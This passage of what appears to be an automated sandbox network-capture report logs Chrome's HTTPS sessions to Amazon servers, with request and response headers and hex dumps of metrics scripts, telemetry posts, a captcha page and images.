                                                                                                                                  2025-01-27 14:45:18 UTC1378INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 80 00 00 00 00 01 00 00 c0 00 00 00 00 03 00 00 e0 00 00 00 00 07 00 00 f8 00 00 00 00 1f 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 20 00 00 00 00 00 80 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 51 ff ff ff 9f ff ff ff d2 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff cf ff ff ff 9c ff ff ff 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 18 ff ff ff b1 ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                  Data Ascii: ( @ QH
                                                                                                                                  2025-01-27 14:45:18 UTC1378INData Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff f2 f2 f2 ff 45 45 44 ff 05 05 04 ff 05 05 04 ff 05 05 04 ff 05 05 04 ff 04 04 03 ff 05 05 04 ff 05 05 03 ff 76 76 76 ff f3 f3 f3 ff 76 76 76 ff 05 05 04 ff 05 05 03 ff 31 31 30 ff d9 d9 d9 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 56 56 55 ff 05 05 04 ff 05 05 04 ff 05 05 04 ff 05 05 04 ff 05 05 04 ff 05 05 04 ff 05 05 04 ff 05 05 04 ff 05 05 04 ff 32 32 30 ff 05 05 04 ff 05 05 04 ff 05 05 04 ff 05 05 04 ff 1d 1d 1c ff d9 d9 d9 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                  Data Ascii: EEDvvvvvv110VVU220
                                                                                                                                  2025-01-27 14:45:18 UTC1378INData Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff e6 e6 e6 ff cc cc cc ff 94 94 93 ff 94 94 93 ff 56 56 55 ff 05 05 04 ff 04 04 03 ff 05 05 04 ff 05 05 04 ff 05 05 03 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff f2 f2 f2 ff cc cc cc ff cc cc cc ff cd cd cd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 05 05 04 ff 05 05 04 ff 05 05 04 ff 05 05 04 ff 05 05 03
                                                                                                                                  Data Ascii: VVU


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  34192.168.2.54985118.66.143.1284433424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2025-01-27 14:45:18 UTC510OUTGET /images/G/01/AUIClients/ClientSideMetricsAUIJavascript-51171fbdd28e1a7a61e922e8f0272af8bc74d37b.secure.variant-desktop-session-snapshot-keypress.min._V2_.js HTTP/1.1
                                                                                                                                  Host: images-na.ssl-images-amazon.com
                                                                                                                                  Connection: keep-alive
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                  Accept: */*
                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                  2025-01-27 14:45:18 UTC1329INHTTP/1.1 200 OK
                                                                                                                                  Content-Type: application/x-javascript
                                                                                                                                  Content-Length: 19614
                                                                                                                                  Connection: close
                                                                                                                                  Server: Server
                                                                                                                                  X-Amz-Ir-Id: 227e3a7a-d22d-49e4-812f-ba82f1ad2878
                                                                                                                                  Date: Tue, 13 Aug 2024 03:29:55 GMT
                                                                                                                                  Cache-Control: max-age=630720000,public
                                                                                                                                  Last-Modified: Thu, 01 Oct 2015 10:17:43 GMT
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Timing-Allow-Origin: https://www.amazon.com
                                                                                                                                  Edge-Cache-Tag: x-cache-333,/images/G/01/AUIClients/ClientSideMetricsAUIJavascript-51171fbdd28e1a7a61e922e8f0272af8bc74d37b.secure.variant-desktop-s
                                                                                                                                  Expires: Mon, 08 Aug 2044 03:29:55 GMT
                                                                                                                                  Surrogate-Key: x-cache-333 /images/G/01/AUIClients/ClientSideMetricsAUIJavascript-51171fbdd28e1a7a61e922e8f0272af8bc74d37b.secure.variant-desktop-s
                                                                                                                                  X-Nginx-Cache-Status: HIT
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  Via: 1.1 70d755f7200c02162c7545e4ce74649a.cloudfront.net (CloudFront)
                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                  Age: 8300403
                                                                                                                                  Server-Timing: cdn-cache-hit,cdn-pop;desc="FRA60-P4",cdn-rid;desc="fGmwCMtTEP-23UluyBe4GxBoEEr7QkRngGPks5qfRi02RBaQm5kWdw==",cdn-hit-layer;desc="EDGE",cdn-downstream-fbl;dur=3,provider;desc="cf"
                                                                                                                                  Accept-Ch: Sec-CH-UA-Form-Factors, Sec-CH-Viewport-Width, Sec-CH-Width, Sec-CH-Viewport-Height, Sec-CH-DPR, ECT
                                                                                                                                  X-Cache: Hit from cloudfront
                                                                                                                                  X-Amz-Cf-Pop: FRA60-P4
                                                                                                                                  X-Amz-Cf-Id: fGmwCMtTEP-23UluyBe4GxBoEEr7QkRngGPks5qfRi02RBaQm5kWdw==
                                                                                                                                  2025-01-27 14:45:18 UTC16384INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 61 2c 63 2c 70 29 7b 66 75 6e 63 74 69 6f 6e 20 6c 28 61 29 7b 66 6f 72 28 76 61 72 20 62 3d 7b 7d 2c 66 2c 63 2c 64 3d 30 3b 64 3c 61 2e 6c 65 6e 67 74 68 3b 64 2b 2b 29 63 3d 61 5b 64 5d 2c 66 3d 63 2e 72 2b 63 2e 73 2b 63 2e 6d 2c 63 2e 63 26 26 28 62 5b 66 5d 7c 7c 28 62 5b 66 5d 3d 5b 5d 29 2c 62 5b 66 5d 2e 70 75 73 68 28 61 5b 64 5d 29 29 3b 72 65 74 75 72 6e 20 62 7d 66 75 6e 63 74 69 6f 6e 20 6b 28 61 29 7b 66 6f 72 28 76 61 72 20 62 3d 31 3b 62 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 62 2b 2b 29 7b 76 61 72 20 66 3d 61 72 67 75 6d 65 6e 74 73 5b 62 5d 3b 74 72 79 7b 69 66 28 66 2e 69 73 53 75 70 70 6f 72 74 65 64 29 72 65 74 75 72 6e 20 66 2e 73 65 6e 64 28 61 29 7d 63 61 74 63 68 28 63 29 7b 7d 7d 7d
                                                                                                                                  Data Ascii: (function(a,c,p){function l(a){for(var b={},f,c,d=0;d<a.length;d++)c=a[d],f=c.r+c.s+c.m,c.c&&(b[f]||(b[f]=[]),b[f].push(a[d]));return b}function k(a){for(var b=1;b<arguments.length;b++){var f=arguments[b];try{if(f.isSupported)return f.send(a)}catch(c){}}}
                                                                                                                                  2025-01-27 14:45:18 UTC3230INData Raw: 7d 7d 7d 28 29 2c 61 2e 75 65 5f 63 65 6c 26 26 61 2e 75 65 5f 63 65 6c 2e 72 65 67 69 73 74 65 72 4d 6f 64 75 6c 65 28 22 6d 6f 75 73 65 20 6d 6f 76 65 20 6d 6f 64 75 6c 65 22 2c 61 2e 75 65 5f 6d 6d 6d 29 29 7d 29 28 75 65 5f 63 73 6d 2c 0a 64 6f 63 75 6d 65 6e 74 29 3b 0a 28 66 75 6e 63 74 69 6f 6e 28 61 2c 63 2c 70 2c 6c 29 7b 21 61 2e 75 65 2e 69 73 42 46 26 26 21 70 2e 75 65 5f 72 70 6c 26 26 61 2e 4d 75 74 61 74 69 6f 6e 4f 62 73 65 72 76 65 72 26 26 61 2e 70 65 72 66 6f 72 6d 61 6e 63 65 26 26 61 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6e 6f 77 26 26 6c 26 26 28 70 2e 75 65 5f 72 70 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 6b 28 61 2c 62 2c 63 29 7b 78 2e 75 6e 73 68 69 66 74 28 7b 65 6c 65 6d 3a 61 2c 74 79 70 65 3a 62 2c
                                                                                                                                  Data Ascii: }}}(),a.ue_cel&&a.ue_cel.registerModule("mouse move module",a.ue_mmm))})(ue_csm,document);(function(a,c,p,l){!a.ue.isBF&&!p.ue_rpl&&a.MutationObserver&&a.performance&&a.performance.now&&l&&(p.ue_rpl=function(){function k(a,b,c){x.unshift({elem:a,type:b,


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  35192.168.2.54985818.204.152.184433424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2025-01-27 14:45:18 UTC622OUTPOST /1/batch/1/OE/ HTTP/1.1
                                                                                                                                  Host: fls-na.amazon.com
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Content-Length: 20686
                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                  Accept: */*
                                                                                                                                  Origin: https://www.amazon.com
                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                  Referer: https://www.amazon.com/
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                  2025-01-27 14:45:18 UTC16384OUTData Raw: 7b 22 72 69 64 22 3a 22 46 58 38 50 4b 56 52 45 44 41 59 4a 54 54 34 48 36 4d 42 4a 22 2c 22 73 69 64 22 3a 22 38 33 37 2d 34 30 39 36 35 39 34 2d 38 37 31 37 31 37 32 22 2c 22 6d 69 64 22 3a 22 41 54 56 50 44 4b 49 4b 58 30 44 45 52 22 2c 22 73 6e 22 3a 22 6f 70 66 63 61 70 74 63 68 61 2e 61 6d 61 7a 6f 6e 2e 63 6f 6d 22 2c 22 72 65 71 73 22 3a 5b 7b 22 63 73 6d 63 6f 75 6e 74 22 3a 7b 22 63 6f 75 6e 74 65 72 22 3a 22 62 61 73 65 6c 69 6e 65 43 6f 75 6e 74 65 72 32 22 2c 22 76 61 6c 75 65 22 3a 31 2c 22 74 22 3a 31 30 33 32 7d 7d 2c 7b 22 6f 70 66 63 73 6d 2d 69 22 3a 7b 22 6b 22 3a 22 72 64 66 22 2c 22 76 22 3a 7b 22 61 65 6c 22 3a 31 2c 22 61 74 6f 62 22 3a 31 2c 22 63 6a 73 22 3a 30 2c 22 63 72 6d 22 3a 30 2c 22 64 63 6d 22 3a 31 2c 22 66 6c 73 22 3a
                                                                                                                                  Data Ascii: {"rid":"FX8PKVREDAYJTT4H6MBJ","sid":"837-4096594-8717172","mid":"ATVPDKIKX0DER","sn":"opfcaptcha.amazon.com","reqs":[{"csmcount":{"counter":"baselineCounter2","value":1,"t":1032}},{"opfcsm-i":{"k":"rdf","v":{"ael":1,"atob":1,"cjs":0,"crm":0,"dcm":1,"fls":
                                                                                                                                  2025-01-27 14:45:18 UTC4302OUTData Raw: 22 2c 22 69 64 22 3a 31 31 37 2c 22 70 69 64 22 3a 31 31 36 2c 22 61 74 74 72 22 3a 7b 22 63 6c 61 73 73 22 3a 22 61 2d 69 63 6f 6e 20 61 2d 6c 6f 67 6f 22 7d 2c 22 74 78 74 22 3a 22 22 7d 7d 2c 7b 22 6f 70 66 63 73 6d 2d 69 22 3a 7b 22 74 22 3a 33 32 35 34 2c 22 73 22 3a 31 31 38 2c 22 6b 22 3a 22 73 6e 70 6d 22 2c 22 6e 22 3a 22 23 74 65 78 74 22 2c 22 69 64 22 3a 31 31 38 2c 22 70 69 64 22 3a 33 36 2c 22 73 69 64 22 3a 31 31 36 2c 22 74 78 74 22 3a 22 5c 6e 5c 6e 20 20 20 20 20 20 20 20 22 7d 7d 2c 7b 22 6f 70 66 63 73 6d 2d 69 22 3a 7b 22 74 22 3a 33 32 35 34 2c 22 73 22 3a 31 31 39 2c 22 6b 22 3a 22 73 6e 70 6d 22 2c 22 6e 22 3a 22 23 74 65 78 74 22 2c 22 69 64 22 3a 31 31 39 2c 22 70 69 64 22 3a 35 2c 22 73 69 64 22 3a 33 36 2c 22 74 78 74 22 3a 22
                                                                                                                                  Data Ascii: ","id":117,"pid":116,"attr":{"class":"a-icon a-logo"},"txt":""}},{"opfcsm-i":{"t":3254,"s":118,"k":"snpm","n":"#text","id":118,"pid":36,"sid":116,"txt":"\n\n "}},{"opfcsm-i":{"t":3254,"s":119,"k":"snpm","n":"#text","id":119,"pid":5,"sid":36,"txt":"
                                                                                                                                  2025-01-27 14:45:18 UTC304INHTTP/1.1 204 No Content
                                                                                                                                  Date: Mon, 27 Jan 2025 14:45:18 GMT
                                                                                                                                  Content-Type: text/plain
                                                                                                                                  Connection: close
                                                                                                                                  x-amzn-RequestId: f7a2208a-1d11-49af-9022-35d971217f52
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Access-Control-Expose-Headers: x-amzn-RequestId,x-amzn-ErrorType,x-amzn-ErrorMessage,Date,smithy-protocol


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  36192.168.2.54990918.204.152.184433424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2025-01-27 14:45:26 UTC621OUTPOST /1/batch/1/OE/ HTTP/1.1
                                                                                                                                  Host: fls-na.amazon.com
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Content-Length: 2143
                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                  Accept: */*
                                                                                                                                  Origin: https://www.amazon.com
                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                  Referer: https://www.amazon.com/
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                  2025-01-27 14:45:26 UTC2143OUTData Raw: 7b 22 72 69 64 22 3a 22 46 58 38 50 4b 56 52 45 44 41 59 4a 54 54 34 48 36 4d 42 4a 22 2c 22 73 69 64 22 3a 22 38 33 37 2d 34 30 39 36 35 39 34 2d 38 37 31 37 31 37 32 22 2c 22 6d 69 64 22 3a 22 41 54 56 50 44 4b 49 4b 58 30 44 45 52 22 2c 22 73 6e 22 3a 22 6f 70 66 63 61 70 74 63 68 61 2e 61 6d 61 7a 6f 6e 2e 63 6f 6d 22 2c 22 72 65 71 73 22 3a 5b 7b 22 6f 70 66 63 73 6d 2d 69 22 3a 7b 22 6b 22 3a 22 6d 6d 6d 33 22 2c 22 74 22 3a 35 32 35 37 2c 22 78 22 3a 36 35 39 2c 22 79 22 3a 34 35 34 7d 7d 2c 7b 22 6f 70 66 63 73 6d 2d 69 22 3a 7b 22 6b 22 3a 22 6d 6d 6d 33 22 2c 22 74 22 3a 31 30 33 38 32 2c 22 78 22 3a 36 35 38 2c 22 79 22 3a 34 35 34 7d 7d 2c 7b 22 6f 70 66 63 73 6d 2d 69 22 3a 7b 22 6b 22 3a 22 6d 6d 6d 33 22 2c 22 74 22 3a 31 30 34 35 35 2c 22
                                                                                                                                  Data Ascii: {"rid":"FX8PKVREDAYJTT4H6MBJ","sid":"837-4096594-8717172","mid":"ATVPDKIKX0DER","sn":"opfcaptcha.amazon.com","reqs":[{"opfcsm-i":{"k":"mmm3","t":5257,"x":659,"y":454}},{"opfcsm-i":{"k":"mmm3","t":10382,"x":658,"y":454}},{"opfcsm-i":{"k":"mmm3","t":10455,"
                                                                                                                                  2025-01-27 14:45:26 UTC304INHTTP/1.1 204 No Content
                                                                                                                                  Date: Mon, 27 Jan 2025 14:45:26 GMT
                                                                                                                                  Content-Type: text/plain
                                                                                                                                  Connection: close
                                                                                                                                  x-amzn-RequestId: 3fb37caa-2a1f-4c05-985c-69ba246573e2
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Access-Control-Expose-Headers: x-amzn-RequestId,x-amzn-ErrorType,x-amzn-ErrorMessage,Date,smithy-protocol


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  37192.168.2.54991099.86.8.424433424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2025-01-27 14:45:26 UTC818OUTGET /errors/validateCaptcha?amzn=oOG14CFEo0qNm3ZfyheDnw%3D%3D&amzn-r=%2F&field-keywords= HTTP/1.1
                                                                                                                                  Host: www.amazon.com
                                                                                                                                  Connection: keep-alive
                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                                  Sec-Fetch-User: ?1
                                                                                                                                  Sec-Fetch-Dest: document
                                                                                                                                  Referer: https://www.amazon.com/
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                  Cookie: csm-sid=837-4096594-8717172
                                                                                                                                  2025-01-27 14:45:27 UTC552INHTTP/1.1 200 OK
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Server: Server
                                                                                                                                  Date: Mon, 27 Jan 2025 14:45:26 GMT
                                                                                                                                  x-amz-rid: V1VKF84K0QR66MXX6Z5J
                                                                                                                                  Strict-Transport-Security: max-age=47474747; includeSubDomains; preload
                                                                                                                                  Vary: Content-Type,Accept-Encoding,User-Agent
                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                  X-Cache: Miss from cloudfront
                                                                                                                                  Via: 1.1 7ce1191b390045e05b9cc74f7514b77a.cloudfront.net (CloudFront)
                                                                                                                                  X-Amz-Cf-Pop: FRA6-C1
                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                  X-Amz-Cf-Id: wX0RfMa3xnxAsm4mECiR65VAUn5dpsDhRJLz1J55Dl3RTZVrjyWppg==
                                                                                                                                  2025-01-27 14:45:27 UTC6599INData Raw: 31 39 62 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 63 6c 61 73 73 3d 22 61 2d 6e 6f 2d 6a 73 20 61 2d 6c 74 2d 69 65 39 20 61 2d 6c 74 2d 69 65 38 20 61 2d 6c 74 2d 69 65 37 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 63 6c 61 73 73 3d 22 61 2d 6e 6f 2d 6a 73 20 61 2d 6c 74 2d 69 65 39 20 61 2d 6c 74 2d 69 65 38 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 63 6c 61 73 73 3d 22 61 2d 6e 6f 2d 6a 73 20 61 2d
                                                                                                                                  Data Ascii: 19bf<!DOCTYPE html>...[if lt IE 7]> <html lang="en-us" class="a-no-js a-lt-ie9 a-lt-ie8 a-lt-ie7"> <![endif]-->...[if IE 7]> <html lang="en-us" class="a-no-js a-lt-ie9 a-lt-ie8"> <![endif]-->...[if IE 8]> <html lang="en-us" class="a-no-js a-
                                                                                                                                  2025-01-27 14:45:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  38192.168.2.549912108.138.16.1954433424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2025-01-27 14:45:27 UTC628OUTGET /captcha/bcxmjlko/Captcha_yeyjbrcolt.jpg HTTP/1.1
                                                                                                                                  Host: images-na.ssl-images-amazon.com
                                                                                                                                  Connection: keep-alive
                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                  Referer: https://www.amazon.com/
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                  2025-01-27 14:45:27 UTC902INHTTP/1.1 200 OK
                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                  Content-Length: 4828
                                                                                                                                  Connection: close
                                                                                                                                  Server: Server
                                                                                                                                  X-Amz-Ir-Id: 29bd543d-81ce-4511-909c-d67b8aa0c19a
                                                                                                                                  Last-Modified: Wed, 08 Feb 2012 17:14:23 GMT
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Edge-Cache-Tag: x-cache-823,/captcha/bcxmjlko/Captcha_yeyjbrcolt
                                                                                                                                  Surrogate-Key: x-cache-823 /captcha/bcxmjlko/Captcha_yeyjbrcolt
                                                                                                                                  X-Nginx-Cache-Status: HIT
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Date: Mon, 27 Jan 2025 14:45:27 GMT
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  Via: 1.1 8dc3ccc34d68ee81173fff2a80f72bde.cloudfront.net (CloudFront)
                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                  Age: 17786
                                                                                                                                  Accept-Ch: Sec-CH-UA-Form-Factors, Sec-CH-Viewport-Width, Sec-CH-Width, Sec-CH-Viewport-Height, Sec-CH-DPR, ECT
                                                                                                                                  Server-Timing: provider;desc="cf"
                                                                                                                                  Timing-Allow-Origin: https://www.amazon.com
                                                                                                                                  X-Cache: Hit from cloudfront
                                                                                                                                  X-Amz-Cf-Pop: FRA56-P7
                                                                                                                                  X-Amz-Cf-Id: Ol6R1VLYFWsWbBXA7EKI2VUeCL10aZTs0IQGMifJ84NAGH0RmVDg1w==
                                                                                                                                  2025-01-27 14:45:27 UTC4828INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff db 00 43 00 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ff c0 00 0b 08 00 46 00 c8 01 01 11 00 ff c4 00 1d 00 01 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 0a 07 09 06 08 0b 05 03 04 ff c4 00 2a 10 00 01 04 02 03 00 01 04 02 03 00 03 00 00 00 00 04 02 03 05 06 01 07 00 08 09 0a 11 12 13 14 15 21 16 17 22 18 19 23 ff da 00 08 01 01 00 00 3f 00 bf 8e 38 e3 8e 61 7d 23 d8 bd 19 d9 28 6b 65 8f 42 6d 5a 4e dd ae 52 2f 12 da da cd 60 a0 cf 81 64 83 8d bb 40 81 13 25 31 5f cc ac 63 c4 04 41 91 e2 4e 46 2c 8c 8c f3 cc e3 24 e1 28 75 79 4a be 99 a3 8e
                                                                                                                                  Data Ascii: JFIFHHCF*!"#?8a}#(keBmZNR/`d@%1_cANF,$(uyJ


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  39192.168.2.54991818.204.152.184433424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2025-01-27 14:45:27 UTC623OUTGET /1/oc-csi/1/OP/requestId=V1VKF84K0QR66MXX6Z5J&js=1 HTTP/1.1
                                                                                                                                  Host: fls-na.amazon.com
                                                                                                                                  Connection: keep-alive
                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                  Referer: https://www.amazon.com/
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                  2025-01-27 14:45:27 UTC176INHTTP/1.1 200 OK
                                                                                                                                  Date: Mon, 27 Jan 2025 14:45:27 GMT
                                                                                                                                  Content-Type: image/gif
                                                                                                                                  Content-Length: 43
                                                                                                                                  Connection: close
                                                                                                                                  x-amzn-RequestId: 240e9be8-2909-4d29-8583-066a1a67282b
                                                                                                                                  2025-01-27 14:45:27 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 00 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 4c 01 00 3b
                                                                                                                                  Data Ascii: GIF89a!,L;


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  40192.168.2.54992218.66.143.1284433424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2025-01-27 14:45:28 UTC394OUTGET /captcha/bcxmjlko/Captcha_yeyjbrcolt.jpg HTTP/1.1
                                                                                                                                  Host: images-na.ssl-images-amazon.com
                                                                                                                                  Connection: keep-alive
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                  Accept: */*
                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                  2025-01-27 14:45:28 UTC857INHTTP/1.1 200 OK
